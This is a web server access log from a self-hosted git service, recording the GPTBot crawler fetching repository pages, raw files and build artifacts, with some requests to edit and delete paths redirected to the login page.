"/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11359] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" -[17/Feb/2026:16:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:16:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11895] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project" [Client 74.7.227.38] [Length 11042] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:16:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 16053] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23935] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:16:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fbase_library.zip" [Client 74.7.227.38] [Length 23812] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:16:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fbase_library.zip" [Client 74.7.227.38] [Length 20828] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:16:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fbase_library.zip" [Client 74.7.227.38] [Length 23784] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:16:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fbase_library.zip" [Client 74.7.227.38] [Length 23822] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:16:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fbase_library.zip" [Client 74.7.227.38] [Length 23817] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:16:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11026] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14505] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:33:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:16:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project" -[17/Feb/2026:16:33:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:16:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project" -[17/Feb/2026:16:33:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:16:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project" -[17/Feb/2026:16:33:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project" [Client 74.7.227.38] [Length 10816] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:16:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 23144] [Gzip 13.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:33:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21603] [Gzip 28.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11894] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:33:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:16:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 